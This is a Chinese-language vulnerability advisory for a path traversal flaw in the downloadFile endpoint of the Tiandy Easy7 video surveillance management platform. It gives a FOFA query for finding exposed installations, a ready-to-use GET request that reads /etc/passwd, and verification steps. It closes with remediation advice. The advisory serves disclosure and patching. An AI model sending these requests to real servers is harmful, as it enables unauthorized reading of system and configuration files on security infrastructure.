天地伟业 Easy7 综合管理平台 downloadFile 接口存在任意文件读取漏洞
免责声明
本文所提供的信息仅供安全研究和教育用途。请勿将文章内的技术用于非法测试。由于传播、利用本文所提供的信息或工具而造成的任何直接或间接后果及损失,均由使用者本人负责。本文作者不承担任何责任。该文章仅供授权的安全测试和学习用途使用。
1. 系统概述
天地伟业 Easy7 视频综合管理平台是天地伟业公司推出的一款集视频监控、报警管理、门禁控制、电子地图等功能于一体的智能安防管理系统。该平台广泛应用于公安、交通、教育及大型园区等行业的安防监控场景,负责海量监控数据的管理与分发。
2. 漏洞详细信息
漏洞类型: 任意文件读取 / 路径遍历
危险等级:高危
漏洞描述: 天地伟业 Easy7 综合管理平台的 /Easy7/rest/file/downloadFile 接口在处理文件下载请求时,未对用户传入的 fileName 参数进行充分的安全校验和路径过滤。攻击者可以通过构造带有目录遍历字符(如 ../)的恶意 payload,突破 Web 根目录限制,读取服务器上的任意敏感系统文件或配置文件,从而导致严重的敏感信息泄露。
FOFA:
app="Tiandy-Easy7"
3. 受影响版本
- 天地伟业 Easy7 综合管理平台
POC验证代码
GET /Easy7/rest/file/downloadFile?fileName=../../../../../../../../../../../../../../etc/passwd HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Connection: close
4. 漏洞验证方法
1. 使用 FOFA 语法定位受影响的资产目标。
2. 构造针对 /Easy7/rest/file/downloadFile 接口的 GET 请求。
3. 将参数 fileName 设置为系统敏感文件的相对路径,例如 Linux 系统下的 ../../../../../../../../../../../../../../etc/passwd或Windows系统下的 ../../../../../../../../../../../../../../windows/win.ini。
4. 若服务器响应 200 OK 且返回了对应的系统文件内容,则确认漏洞存在。
5. 修复建议
修复方案:
1. 对 downloadFile 接口的输入参数进行严格过滤,禁止出现 ..、/、\ 等目录遍历敏感字符。
2. 建议对下载路径进行白名单限制,仅允许访问预设的特定下载目录。
3. 使用文件 ID 映射机制代替直接传递文件名,即通过数据库 ID 获取对应路径,避免暴露物理路径信息。
4. 及时联系厂商天地伟业获取官方安全补丁或升级至最新安全版本。



